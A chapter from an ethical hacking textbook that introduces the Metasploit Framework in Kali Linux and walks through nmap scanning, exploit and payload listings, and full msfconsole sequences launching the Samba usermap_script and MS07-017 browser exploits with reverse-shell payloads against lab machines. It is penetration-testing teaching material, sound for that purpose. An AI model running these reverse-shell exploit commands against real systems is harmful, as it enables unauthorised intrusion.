© Sanjib Sinha 2018
Sanjib SinhaBeginning Ethical Hacking with Kali Linuxhttps://doi.org/10.1007/978-1-4842-3891-2_12

12. Introducing Metasploit in Kali Linux

Sanjib Sinha1 
Howrah, West Bengal, India

The Metasploit Framework (MSF) is a solid foundation that you can build on for penetration testing. You can also customize it according to your needs. It is considered by the community of ethical hackers as one of the most complete collections of exploits, and the Kali Linux makers believe that Metasploit is one of the most useful security auditing tools freely available to security professionals. It was first developed by H.D. Moore in 2001 using the Perl language; later, it was completely rewritten in Ruby, and the company Rapid7 acquired it.

Metasploit gives you an awesome working environment. From web vulnerability plugins to network information gathering and from an extensive exploit development environment to commercial-grade exploits, you will hardly find any tool parallel to Metasploit.

Frankly, Metasploit deserves a complete book to cover all its features; keeping that in mind, you’ll find that this single chapter will probably not quench your thirst for knowledge about the tool. Therefore, I encourage you to spend time researching the modules. Since it is free, there are a wide array of helpful articles and forum posts available on the Internet. Moreover, you can get the developer documentation in the metasploit-framework folder. In the next section, I will show you specifically where you can find it.

In this chapter, the victim machine will be running Windows XP, and the attacking machine will be running Kali Linux. At the beginning of this book, I showed you how to install Metasploitable, an intentionally vulnerable Linux virtual machine that can be used to conduct security training. You can also perform your penetration testing techniques on it. You will also need a Windows virtual machine and Internet Explorer to work with some of the exploits covered in this chapter.

Understanding the Metasploit Architecture

Understanding the Metasploit architecture is not difficult. You can take a look at the file system to get a feel for what lies inside. In Kali Linux, Metasploit is provided in the /usr/share/metasploit-framework directory.

Here’s some output where you can take a look at the main Metasploit folder:
//code and output of metasploit-framework
root@kali:~# cd /usr/share/metasploit-framework/
root@kali:/usr/share/metasploit-framework# ls
app            Gemfile                       msfconsole  msfupdate  scripts
config         Gemfile.lock                  msfd        msfvenom   tools
data           lib                           msfdb       plugins    vendor
db             metasploit-framework.gemspec  msfrpc      Rakefile
documentation  modules                       msfrpcd     ruby

In the output on the screen (not shown here), you will find two colors: blue and green. Things like msfconsole are in green. This means it is an executable. Things like data, lib, modules, and a few others are in blue; they are folders. When you click Metasploit in your Applications list, msfconsole is executed, and a new terminal opens. Most of the things you do in Metasploit are done in this terminal. The folder lib contains libraries.

Metasploit libraries are especially important. These libraries allow you to run the exploits, and you do not need to write additional code for simple tasks such as HTTP requests.
// code and output of metasploit-framework library
root@kali:/usr/share/metasploit-framework# cd lib/
root@kali:/usr/share/metasploit-framework/lib# ls
anemone        metasploit  postgres         rbmysql.rb  snmp     telephony
anemone.rb     msf         postgres_msf.rb  rex         snmp.rb  telephony.rb
enumerable.rb  msfenv.rb   rabal            rex.rb      sqlmap   windows_console_color_support.rb
metasm         net         rbmysql          robots.rb   tasks

The files ending with .rb are all Ruby files because the Metasploit framework was written in Ruby language.

Understand how things are stored in and related to the Metasploit file system will definitely help you use msfconsole and the other Metasploit interfaces. Understanding Metasploit modules is also crucial because almost all the interactions with Metasploit happen through these modules. You can find modules in two places. The primary one is in /usr/share/metasploit-framework/modules/.
// code and output of metasploit-framework modules
root@kali:/usr/share/metasploit-framework# cd modules/
root@kali:/usr/share/metasploit-framework/modules# ls
auxiliary  encoders  exploits  nops  payloads  post
Penetration testers store their custom modules under the home directory.
root@kali:cd ~/msf4
history  local  logos logs modules plugins
All Metasploit modules are organized into separate directories, where exploit modules are defined as modules that use payloads. Payloads consist of code that runs remotely; the nops keep the payload sizes consistent across exploit attempts. You will learn about them in the next section.
// code and output of metasploit-framework exploits
root@kali:~# ls /usr/share/metasploit-framework/modules/exploits/
aix        bsdi        firefox  irix       multi    solaris
android    dialup      freebsd  linux      netware  unix
apple_ios  example.rb  hpux     mainframe  osx      windows

There are different types of exploits inside, such as apple_ios, windows, and more. If you go inside windows, you will find lots of stuff there including antivirus, backdoor, firewall, mysql, mssql, and many more. If you want to look further, you can go inside mysql, ftp, or browser, and you will find a bunch of Ruby files. They are actual modules written in Ruby, and they work in the background.

Auxiliary modules include port scanners, fuzzers, sniffers, and more. In most cases, you will use scanners. This is explained in the next section.
// code and output of metasploit-framework auxiliary part of modules
root@kali:~# ls /usr/share/metasploit-framework/modules/auxiliary/
admin    client   dos         gather  scanner  spoof  vsploit
analyze  crawler  example.rb  parser  server   sqli
bnat     docx     fuzzers     pdf     sniffer  voip
Payloads, Encoders, Nops

Summarizing Modules

Metasploit can present multifaceted interfaces, mainly msfconsole, to the background modules that control exploitation. The console interface is much faster because it presents the attack commands.

You can either start it from the Kali Linux terminal or pick it up from the Applications menu.

Let’s first start Metasploit and create a workspace. In this workspace, you will test Metasploit.
// code and output of metasploit-framework workspace
msf > workspace
* default
msf > workspace -a sanjib
[*] added workspace sanjib
msf > workspace -h
workspace                  List workspaces
workspace -v               List workspaces verbosely
workspace [name]           Switch workspace
workspace -a [name] ...    Add workspace(s)
workspace -d [name] ...    Delete workspace(s)
workspace -D               Delete all workspaces
workspace -r <old><new>    Rename workspace
workspace -h               Show this help information
msf > workspace sanjib
[*] Workspace: sanjib
msf >

Let’s look at the previous code. The first command shows one thing. There is a default workspace, which is defined as default. You can get some help by running the help command (-h). Now the time has come to enter the newly created workspace: sanjib. Now, you can start working inside it. You will work on it in the next sections. Before getting your hands dirty with actual work, you will get a quick overview of the functions that Metasploit modules have.

The modules have a few specific functions. Let’s consider the payload first. After a successful exploitation, the payload starts working. These are fragments of malicious code that implement necessary commands to get work done. You will see examples in the coming sections. Penetration testers target specific vulnerabilities first, and after that, payloads start working. The modules’ exploits work here. Active exploits will exploit a specific target, run until completed, and then exit. Passive exploits wait for incoming hosts such as FTP clients or web browsers and then exploit them.

There is another important set of modules, called auxiliary modules . They do not directly establish a connection between a penetration tester and the target system. However, they perform a few handfuls of necessary actions such as scanning, fuzzing, or sniffing that support the exploit modules.

You also need to know about the Encoders module . The situation arises when an exploit module must bypass antivirus defenses. Encoders help to encode the payload so that it cannot be detected. There are also other modules that are known as Post modules; they start working after a successful attack, and they run on compromised targets to gather useful data and pivot the attacker deeper into the target network.

Finally, there are no operations modules; they are known as nops. You will find them in file systems. During attacks, these modules facilitate buffer overflows.

Now that you know some of the basic modules of Metasploit, you can see Metasploit in action.

Type this command:
// code and output of using nmap in metasploit-framework
msf > nmap -sV
Here goes the output as Metasploit has started working on your Kali Linux terminal.
[*] exec: nmap -sV
Starting Nmap 7.60 ( https://nmap.org ) at 2018-06-05 06:18 IST
Nmap scan report for
Host is up (0.000093s latency).
Not shown: 997 closed ports
80/tcp  open  http        Apache httpd 2.4.7 ((Ubuntu))
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service Info: Host: SS-H81M-S1
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.99 seconds
msf >

This performs simple Nmap scanning on the host machine’s IP address. Several applications were identified in the previous output. As a penetration tester, you can investigate any of them for any known vulnerabilities. You can start with Metasploit’s own collection of exploits.

You can start the search for exploits on the samba server using this command:
//code of using "search" in Metasploit
msf> search samba
This will give you tons of exploits. You just need to pick the best ones.
//the output of search
exploit/unix/misc/distcc_exec                   2002-02-01       excellent  DistCC Daemon Command Execution
exploit/unix/webapp/citrix_access_gateway_exec  2010-12-21       excellent  Citrix Access Gateway Command Exe
Here you will use exploit/multi/samba/usermap_script because it is ranked as excellent. Issuing this command will give you more output where you can get more information about this exploit.
//code of using "info"
msf > info exploit/multi/samba/usermap_script
Name: Samba "username map script" Command Execution
Module: exploit/multi/samba/usermap_script
Platform: Unix
Arch: cmd
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2007-05-14
Provided by:
Available targets:
Id  Name
--  ----
0   Automatic
Basic options:
Name   Current Setting  Required  Description
----   ---------------  --------  -----------
RHOST                   yes       The target address
RPORT  139              yes       The target port (TCP)
Payload information:
Space: 1024
This module exploits a command execution vulnerability in Samba
versions 3.0.20 through 3.0.25rc3 when using the non-default
"username map script" configuration option. By specifying a username containing shell metacharacters, attackers can execute arbitrary commands. No authentication is needed to exploit this vulnerability since this option is used to map usernames prior to authentication!
OSVDB (34700)
msf >

If you are interested in reading more, the information page gives you a few good links. When you are starting your career as a security professional, it is good to visit as many web sites as possible where ethical hackers post their articles.

Here, you need to set the target machine’s IP address by using RHOST, and the port will be RPORT. After that, you can proceed to the exploit.

From the preceding output, you can get some details that can help you to move forward.

The next lines of code give you an idea of how you are going to use that exploit against the host machine’s IP address:
//code of using the exploit
msf > use exploit/multi/samba/usermap_script
msf exploit(multi/samba/usermap_script) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf exploit(multi/samba/usermap_script) > set RHOST xxx.xxx.x.x
msf exploit(multi/samba/usermap_script) > set RPORT 139
RPORT => 139
msf exploit(multi/samba/usermap_script) > set LHOST xx.x.x.xx
msf exploit(multi/samba/usermap_script) > exploit

You should not choose any live system as the remote host (RHOST) unless you are asked because that is the system being attacked. The local host (LHOST) is the system used to launch the attack. So, be careful about using Metasploit. You must know what you are doing.

Just type one command after another and see what output you get in your virtual Kali Linux Metasploit terminal. For the remote host, I have chosen my host machine’s IP address, and for the local host, I have chosen my virtual machine’s IP address; just replace these with your own.

You can do another thing to test that your virtual machines are communicating with each other and your network configuration is working. This is important so that in the future you can just scan your whole network and see what types of machines are running in your network.

Let’s open Kali Linux and Windows XP in a virtual machine and type the command to ping the Windows virtual machine’s IP address as shown here:
//pinging guest Windows IP
ping xx.x.x.xx
PING xx.x.x.xx (xx.x.x.xx) 56(84) bytes of data.
64 bytes from xx.x.x.xx icmp_seq=1 ttl=64 time=0.024ms
64 bytes from xx.x.x.xx icmp_seq=1 ttl=64 time=0.029ms
64 bytes from xx.x.x.xx icmp_seq=1 ttl=64 time=0.020ms
64 bytes from xx.x.x.xx icmp_seq=1 ttl=64 time=0.030ms
64 bytes from xx.x.x.xx icmp_seq=1 ttl=64 time=0.028ms
64 bytes from xx.x.x.xx icmp_seq=1 ttl=64 time=0.035ms
64 bytes from xx.x.x.xx icmp_seq=1 ttl=64 time=0.022ms
64 bytes from xx.x.x.xx icmp_seq=1 ttl=64 time=0.030ms
... xx.x.x.xx ping statistics ...
8 packets transmitting, 8 received, 0% loss, time 204ms

At the same time, in your virtual Windows XP machine, ping the Kali Linux IP address to see the result.

You can change the Kali Linux IP address with this command:
//changing IP of Kali Linux
ifconfig eth0 xx.x.x.xx

Now you can try pinging from Windows again and see the results.

Just to get more of a feel for using msfconsole, you can again scan your network to see what machines are open currently. Before starting the scan, just type ? in your msfconsole and see the results. You can also issue a single command such as hosts to see what you get. If you have not started the Nmap scanning, the hosts table will show up as empty. Once the scanning is over, it will be filled up.

Mixins and Plugins in Ruby

Before discussing Metasploit more, let’s try to understand what Ruby is because all modules in the Metasploit framework are written in Ruby classes. This section is a brief overview of Ruby.

Ruby is a dynamic, object-oriented, interpreted, general-purpose programming language. Modules inherit their attributes and methods from type-specific classes, and there is a shared common application programming interface (API) between the modules. An API is a set of functions and procedures that allow you to create applications. These applications can then access the features or data of an operating system, application, or other services. Payloads are slightly different. They are created at runtime from various components. Another interesting facet of these classes in Ruby is they all have one parent class.

A little bit of object-oriented programming knowledge will help you understand another important thing. Modules in Metasploit can add new methods, and they can also overload methods.

You will find another term quite frequently used in Metasploit: mixins. These are a great feature in Ruby. The term comes from the fact that they “get mixed in.” In other words, they include one class into another. This is slightly different from the concept of inheritance that is used in other object-oriented programming languages; however, it has some similarities. For now, you should note a few important things. For mixins, modules can override classes, and they also can add new features, such as protocol-specific or behavior-specific such as brute force. The connect method is implemented by a TCP mixin, and then it is overloaded by other network protocols. There is a scanner mixin that overloads the run method.

On the other hand, plugins work directly with the API. They manipulate the overall framework and hook into the event system. Because of that, plugins easily automate tasks that would be tedious if you wanted to do them manually. By the way, plugins work only in msfconsole. With the help of plugins, you can add new console commands to extend the framework functionality as a whole.

Just like Python, Ruby is a simpler language to learn than C++; so, you should try to learn the few. This will assist you to understand Metasploit better.

Finally, you may ask, why instead of using Python or C++ did the Metasploit makers choose Ruby? After all, Ruby is not a popular choice in security programming.

Well, it’s better to listen to the makers of Metasploit. In the documentation, they have put their feeling into words this way:

“The Python programming language was also a language candidate. The reason the Metasploit staff opted for Ruby instead of Python was for a few different reasons. The primary reason is a general distaste for some of the syntactical annoyances forced by Python, such as block indention. While many would argue the benefits of such an approach, some members of the Metasploit staff find it to be an unnecessary restriction. Other issues with Python center around limitations in parent class method calling and backward compatibility of interpreters.”

As a Python lover, you may disagree with this argument, but that should not stop you from using Metasploit; after all, it is one of the best ethical hacking tools available. Metasploit’s capabilities are staggering, especially with the open extensions through plugins and modules. It is not only powerful but versatile.

Metasploit Console or Interface

The command-line interface to the Metasploit Framework is extremely powerful. This interface is what opens when you open Metasploit Framework from the Kali Linux Application toolbar.

Let’s open the Metasploit console and issue the ? command .

You will get a long listing, and explaining all the output is beyond the scope of this book. I’m sure you are eager to see only the database back-end commands. Here is the output:
//output "?" command
Database Backend Commands
Command           Description
-------           -----------
db_connect        Connect to an existing database
db_disconnect     Disconnect from the current database instance
db_export         Export a file containing the contents of the database
db_import         Import a scan result file (filetype will be auto-detected)
db_nmap           Executes nmap and records the output automatically
db_rebuild_cache  Rebuilds the database-stored module cache
db_status         Show the current database status
hosts             List all hosts in the database
loot              List all loot in the database
notes             List all notes in the database
services          List all services in the database
vulns             List all vulnerabilities in the database
workspace         Switch between database workspaces
Now you can check the database status. Issue the following command on your terminal:
//code of database status
msf > db_status
[*] postgresql connected to msf
msf >

The output shows that PostgreSQL is connected to Metasploit.

Now you are ready to move further, so you will want to use the db_nmap command to see whether there are any vulnerable machines. This time I am going to use the db_nmap command via VMware Player on a Windows 7 host machine. I have also opened virtual Kali Linux, and I have opened virtual Windows XP.

The db_nmap command says clearly what it is going to do.
//description of using db_nmap
db_nmap           Executes nmap and records the output automatically

It will execute an Nmap scan, and it will also record the output automatically. You have already learned about Nmap. As far as versatility is concerned, it is almost equal to Metasploit. So, the combination of Nmap and Metasploit could be deadly for any target machine.

Issue the following command to check the status of all 255 hosts in the network:
//code of using db_nmap
db_nmap -A --vv
This code will execute the nmap command , and it will also keep a record of the output. The output is fairly long, so I won’t list it all here, but these lines seem interesting:
//part outputs
[*] Nmap: Nmap scan report for
[*] Nmap: Host is up, received arp-response (0.00021s latency).
[*] Nmap: Scanned at 2018-06-06 19:55:30 EDT for 137s
[*] Nmap: Not shown: 988 closed ports
[*] Nmap: Reason: 988 resets
[*] Nmap: PORT      STATE SERVICE         REASON          VERSION
[*] Nmap: 135/tcp   open  msrpc           syn-ack ttl 128 Microsoft Windows RPC
[*] Nmap: 139/tcp   open  netbios-ssn     syn-ack ttl 128 Microsoft Windows netbios-ssn
[*] Nmap: 445/tcp   open  microsoft-ds    syn-ack ttl 128 Windows 7 Ultimate 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
[*] Nmap: 902/tcp   open  ssl/vmware-auth syn-ack ttl 128 VMware Authentication Daemon 1.10 (Uses VNC, SOAP)
[*] Nmap: 912/tcp   open  vmware-auth     syn-ack ttl 128 VMware Authentication Daemon 1.0 (Uses VNC, SOAP)
[*] Nmap: 1947/tcp  open  http            syn-ack ttl 128 Aladdin/SafeNet HASP license manager 12.49

This is my host machine, which is Windows 7. It seems like it is not protected because the ports are open. I have kept it like that to give you an example what happens in the majority of cases. You can keep the firewall on, but that does not stop the combination of Nmap and Metasploit from exploiting such machines.

You can get more details such as the username, MAC address, and more using the following commands (00:50:56:c0:00:08 for Windows 7 and 00:50:56:FB:98:F8 for Windows XP):
// more output of using db_nmap
[*] Nmap: | Names:
[*] Nmap: |   SS-PC<00>            Flags: <unique><active>
[*] Nmap: |   WORKGROUP<00>        Flags: <group><active>
[*] Nmap: |   SS-PC<20>            Flags: <unique><active>
[*] Nmap: |   WORKGROUP<1e>        Flags: <group><active>
[*] Nmap: |   WORKGROUP<1d>        Flags: <unique><active>
[*] Nmap: |   x01x02__MSBROWSE__x02<01>  Flags: <group><active>
At the end of the output, you get these lines:
//the end output
[*] Nmap: Completed NSE at 19:57, 0.00s elapsed
[*] Nmap: Read data files from: /usr/bin/../share/nmap
[*] Nmap: OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 256 IP addresses (4 hosts up) scanned in 143.53 seconds
[*] Nmap: Raw packets sent: 5671 (251.038KB) | Rcvd: 4073 (169.906KB)
Now the time has come to finally issue the hosts command to see what you get. The hosts command will give you a list of all hosts in the database.
//output of using "hosts" command
address          mac                name  os_name    os_flavor  os_sp  purpose  info  comments
-------          ---                ----  -------    ---------  -----  -------  ----  --------    00:50:56:c0:00:08        Windows 7                    client    00:50:56:f8:ef:30        Player                       device  00:50:56:FB:98:F8        Windows XP            SP2
msf >

The last one that was also captured in the scanning process is the virtual Windows XP machine. So now you have not only the IP address but also the MAC address and the service pack that is being used. These facts are extremely useful for attacking the target machine.

Exploits and Payloads in Metasploit

Metasploit is all about exploitation. Quite naturally the most desirable command-line term is show exploits. It gives you a long listing of all the exploits contained in the Metasploit Framework. You’ll come back to this in the next section.

There are two types of exploits: active and passive. In active exploits , module execution stops when an error occurs. By just passing the -j command , you can force an active module in the background.

In passive exploits , the exploit almost always focuses on the client side such as web browsers or FTP clients. Passing the -i command can make passive exploits interact with the shell. Another advantage of passive exploits is they can be used in conjunction with e-mail exploits. In Metasploit, after a successful exploitation, a payload will start working. As I said earlier, payloads are nothing but fragments of malicious code, and the payloads actually implement necessary commands to get the after-exploitation work done.

Penetration testers usually set a specific target, and then the active exploits start running. A passive exploit would wait for incoming hosts, such as web browsers, to connect. Once they got hold of them, they start exploiting them.

How to Use Exploit and Payloads

There are thousands of exploits and hundreds of payloads available in Metasploit. What type of exploitation do you want to do? You can target the guest Windows XP machine and expose its vulnerabilities.

Open the Metasploit Framework, and you will be greeted with how many exploits there are to use.
//the total exploits and payloads
+ -- --=[ 1722 exploits - 986 auxiliary - 300 post        ]
+ -- --=[ 507 payloads - 40 encoders - 10 nops
After that, you will issue the show exploits command and can check the output. Next, you can check out the other options available.
//code of showing exploits
msf > show exploits
Name                                            Disclosure Date  Rank       Description
----                                            ---------------  ----       -----------
aix/local/ibstat_path                           2013-09-24       excellent  ibstat $PATH Privilege Escalation
aix/rpc_cmsd_opcode21                                        2009-10-07       great      AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 Buffer Overflow
aix/rpc_ttdbserverd_realpath                    2009-06-17       great      ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX)
android/adb/adb_server_exec                     2016-01-01       excellent  Android ADB Debug Server Remote Payload Execution
android/browser/samsung_knox_smdm_url           2014-11-12       excellent  Samsung Galaxy KNOX Android Browser RCE
android/browser/stagefright_mp4_tx3g_64bit      2015-08-13       normal     Android Stagefright MP4 tx3g Integer Overflow
android/browser/webview_addjavascriptinterface  2012-12-21       excellent  Android Browser and WebView addJavascriptInterface Code Execution
android/fileformat/adobe_reader_pdf_js_interface  2014-04-13       good       Adobe Reader for Android addJavascriptInterface Exploit
android/local/futex_requeue                     2014-05-03       excellent  Android 'Towelroot' Futex Requeue Kernel Exploit
android/local/put_user_vroot                    2013-09-06       excellent  Android get_user/put_user Exploit
apple_ios/browser/safari_libtiff                2006-08-01       good       Apple iOS MobileSafari LibTIFF Buffer Overflow
apple_ios/email/mobilemail_libtiff              2006-08-01       good       Apple iOS MobileMail LibTIFF Buffer Overflow
apple_ios/ssh/cydia_default_ssh                 2007-07-02       excellent  Apple iOS Default SSH Password Vulnerability
This is a long list. For brevity, I have cut it short here. For a Windows-specific exploitation, you can also use the search command. You can search anything in Metasploit.
//using search
msf > search dcom
dcom (Distributed Component Object Model) is a set of Microsoft program interfaces that help you send requests to other computers over the network. It comes with Windows OS. So, you need to search it using msf .
// output of dcom
msf > search dcom
Matching Modules
   Name                                       Disclosure Date  Rank    Description
   ----                                       ---------------  ----    -----------
   auxiliary/scanner/telnet/telnet_ruggedcom                   normal  RuggedCom Telnet Password Generator
   exploit/windows/dcerpc/ms03_026_dcom       2003-07-16       great   MS03-026 Microsoft RPC DCOM Interface Overflow
   exploit/windows/smb/ms04_031_netdde        2004-10-12       good    MS04-031 Microsoft NetDDE Service Overflow
   exploit/windows/smb/psexec_psh             1999-01-01       manual  Microsoft Windows Authenticated Powershell Command Execution

This will give you a specific listing of exploits. Using this type of exploitation, you can generate a password and do many more things.

You can search the Windows Server–related API and find out how you can exploit the vulnerable corruptions.
//searching netapi
msf > search netapi
// output of netapi
msf > search netapi
Matching Modules
   Name                                 Disclosure Date  Rank    Description
   ----                                 ---------------  ----    -----------
   exploit/windows/smb/ms03_049_netapi  2003-11-11       good    MS03-049 Microsoft Workstation Service NetAddAlternateComputerName Overflow
   exploit/windows/smb/ms06_040_netapi  2006-08-08       good    MS06-040 Microsoft Server Service NetpwPathCanonicalize Overflow
   exploit/windows/smb/ms06_070_wkssvc  2006-11-14       manual  MS06-070 Microsoft Workstation Service NetpManageIPCConnect Overflow
   exploit/windows/smb/ms08_067_netapi  2008-10-28       great   MS08-067 Microsoft Server Service Relative Path Stack Corruption
You can also use the adduser payloads to exploit the vulnerable Windows XP, and you can attack any Windows XP machine by adding users to it.
//searching adduser
msf > search adduser
// output of adduser
msf > search adduser
Matching Modules
   Name                         Disclosure Date  Rank    Description
   ----                         ---------------  ----    -----------
   payload/cmd/windows/adduser                   normal  Windows Execute net user /ADD CMD
   payload/linux/armle/adduser                   normal  Linux Add User
   payload/linux/x86/adduser                     normal  Linux Add User
   payload/windows/adduser                       normal  Windows Execute net user /ADD
The first step is to use the exploit, and then you add the necessary payload to start the exploitation. Therefore, you can similarly use the show payloads command to see what type of payloads there are.
//code and output of showing payloads
msf > show payloads
Name                                  Disclosure Date  Rank    Description
----                                  ---------------  ----    -----------
aix/ppc/shell_bind_tcp                                 normal  AIX Command Shell, Bind TCP Inline
aix/ppc/shell_find_port                                normal  AIX Command Shell, Find Port Inline
aix/ppc/shell_interact                                 normal  AIX execve Shell for inetd
aix/ppc/shell_reverse_tcp                              normal  AIX Command Shell, Reverse TCP Inline
android/meterpreter/reverse_http                       normal  Android Meterpreter, Android Reverse HTTP Stager
android/meterpreter/reverse_https                      normal  Android Meterpreter, Android Reverse HTTPS Stager
android/meterpreter/reverse_tcp                        normal  Android Meterpreter, Android Reverse TCP Stager
android/meterpreter_reverse_http                       normal  Android Meterpreter Shell, Reverse HTTP Inline
android/meterpreter_reverse_https                      normal  Android Meterpreter Shell, Reverse HTTPS Inline
android/meterpreter_reverse_tcp                        normal  Android Meterpreter Shell, Reverse TCP Inline

I have cut the output short here, as this is very long.

How to Start Exploits

Starting exploits is fairly simple if you know the technique. Here I will show how to exploit my guest Windows XP machine and create a directory there using the Metasploit Framework in Kali Linux. This can be done by searching for the necessary exploits first.
//code of searching specific exploit
msf > search chunksize
The chunksize part is an msf module that opens many types of Windows vulnerabilities. The previous command will give you a few lines of output, as shown here:
//the search result
windows/browser/ms07_017_ani_loadimage_chunksize                  2007-03-28       great      Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP)
windows/browser/ms08_041_snapshotviewer                           2008-07-07       excellent  Snapshot Viewer for Microsoft Access ActiveX Control Arbitrary File Download
windows/browser/ms08_053_mediaencoder                             2008-09-09       normal     Windows Media Encoder 9 wmex.dll ActiveX Buffer Overflow
windows/browser/ms08_070_visual_studio_msmask                     2008-08-13       normal     Microsoft Visual Studio Mdmask32.ocx ActiveX Buffer Overflow

Through the first one, you can access any Windows XP machine and add a new directory in the targeted machine. It is done with the HTTP protocol. All you need to do is start your local server in Kali Linux first. Next, from the Windows XP machine’s Internet Explorer browser, you will access that IP address. Crackers use the same method by sending e-mails where these links are given. When users click the link, their machine is compromised.

Your first step will be use that exploit.
//code of using exploit
msf > use exploit/windows/browser/ms07_017_ani_loadimage_chunksize
Next you will try the show options command to see what options are available for you.
//code of showing options for that exploit
msf exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > show options
Module options (exploit/windows/browser/ms07_017_ani_loadimage_chunksize):
Name     Current Setting  Required  Description
----     ---------------  --------  -----------
SRVHOST          yes       The local host to listen on. This must be an address on the local machine or
SRVPORT  80               yes       The daemon port to listen on
SSL      false            no        Negotiate SSL for incoming connections
SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
URIPATH  /                yes       The URI to use.
Exploit target:
Id  Name
--  ----
0   (Automatic) IE6, IE7 and Firefox on Windows NT, 2000, XP, 2003 and Vista
msf exploit(windows/browser/ms07_017_ani_loadimage_chunksize) >
The table with two columns is extremely important here. The first column is Current Setting, and the second one is Required. You can also see the targets by using the command show targets .
//code and output of showing targets
msf exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > show targets
Exploit targets:
Id  Name
--  ----
0   (Automatic) IE6, IE7 and Firefox on Windows NT, 2000, XP, 2003 and Vista
1   IE6 on Windows NT, 2000, XP, 2003 (all languages)
2   IE7 on Windows XP SP2, 2003 SP1, SP2 (all languages)
3   IE7 and Firefox on Windows Vista (all languages)
4   Firefox on Windows XP (English)
5   Firefox on Windows 2003 (English)

From this output, you can see what types of browsers are vulnerable and what types of Windows machines are undefended. There are a few versions of Internet Explorer and Firefox too.

Now that you have seen the options, next you will use the necessary payloads. Before that, you will ask Metasploit to show all concerned payloads that are necessary for doing the exploit.
//code of showing payloads
msf exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > show payloads
Compatible Payloads
Name                                            Disclosure Date  Rank    Description
----                                                ---------------  ----    -----------
generic/custom                                          normal  Custom Payload
generic/debug_trap                                      normal  Generic x86 Debug Trap
generic/shell_bind_tcp                                   normal  Generic Command Shell, Bind TCP Inline
generic/shell_reverse_tcp                               normal  Generic Command Shell, Reverse TCP Inline
generic/tight_loop                                      normal  Generic x86 Tight Loop
windows/dllinject/bind_hidden_ipknock_tcp              normal  Reflective DLL Injection, Hidden Bind Ipknock TCP Stager
windows/dllinject/bind_hidden_tcp                        normal  Reflective DLL Injection, Hidden Bind TCP Stager
windows/dllinject/bind_ipv6_tcp                         normal  Reflective DLL Injection, Bind IPv6 TCP Stager (Windows x86)
windows/dllinject/bind_ipv6_tcp_uuid                      normal  Reflective DLL Injection, Bind IPv6 TCP Stager with UUID Support (Windows x86)
windows/dllinject/bind_nonx_tcp                           normal  Reflective DLL Injection, Bind TCP Stager

This is a table here. It shows all the payloads that you can use for exploitation.

You have already used the exploit and seen the options and targets; now you will use the payloads this way.
//code of setting payload
msf exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
msf exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > show options

Again, you can use show options and see what options are available for you. For that reason, I have issued the show options command .

Now, let’s look at the output in detail. This is important because you need to know what settings are required and what settings are not required.
//output of showing options
Module options (exploit/windows/browser/ms07_017_ani_loadimage_chunksize):
Name     Current Setting  Required  Description
----     ---------------  --------  -----------
SRVHOST          yes       The local host to listen on. This must be an address on the local machine or
SRVPORT  80               yes       The daemon port to listen on
SSL      false            no        Negotiate SSL for incoming connections
SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
URIPATH  /                yes       The URI to use.
Payload options (windows/shell_reverse_tcp):
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique (Accepted: ", seh, thread, process, none)
LHOST                      yes       The listen address
LPORT     4444             yes       The listen port
Exploit target:
Id  Name
--  ----
0   (Automatic) IE6, IE7, and Firefox on Windows NT, 2000, XP, 2003 and Vista

There is another table in the terminal, and you can see what current settings are required. Everything is settled, except the LHOST or localhost part. Even the exploitation target has been given by Metasploit: “(Automatic) IE6, IE7 and Firefox on Windows NT, 2000, XP, 2003 and Vista.”

You need to set LHOST to Metasploit by issuing the necessary command and again issue the show options command to see that everything has been settled properly.
//code of setting localhost and showing options
msf exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > set LHOST
msf exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > show options
I have checked my Kali Linux IP address and set the localhost so that the targeted machine will open the IP address in the browser and get compromised. The output gives you the feedback that everything is okay.
//output of show-options
Module options (exploit/windows/browser/ms07_017_ani_loadimage_chunksize):
Name     Current Setting  Required  Description
----     ---------------  --------  -----------
SRVHOST          yes       The local host to listen on. This must be an address on the local machine or
SRVPORT  80               yes       The daemon port to listen on
SSL      false            no        Negotiate SSL for incoming connections
SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
URIPATH  /                yes       The URI to use.
Payload options (windows/shell_reverse_tcp):
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique (Accepted: ", seh, thread, process, none)
LHOST        yes       The listen address
LPORT     4444             yes       The listen port
Exploit target:
Id  Name
--  ----
0   (Automatic) IE6, IE7 and Firefox on Windows NT, 2000, XP, 2003 and Vista
Now that LHOST is set, you can safely issue the final command exploit.
//code and output of final exploit command
msf exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > exploit
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on
msf exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > [*] Using URL:
[*] Local IP:
[*] Server started.

As the guest Kali Linux server starts, any Windows NT, 2000, XP, 2003, and Vista version will be compromised if they open the IE browser and type

This is partly a spoofing technique, where targeted machines are asked to click a malicious link. Now, as a penetration tester, you are in a position to show your clients why they should immediately upgrade old versions of Windows.

Unfortunately, in today’s world, many computer still use old Windows versions, which have a lot of vulnerabilities that are evident from the Metasploit exploits covered in this chapter.

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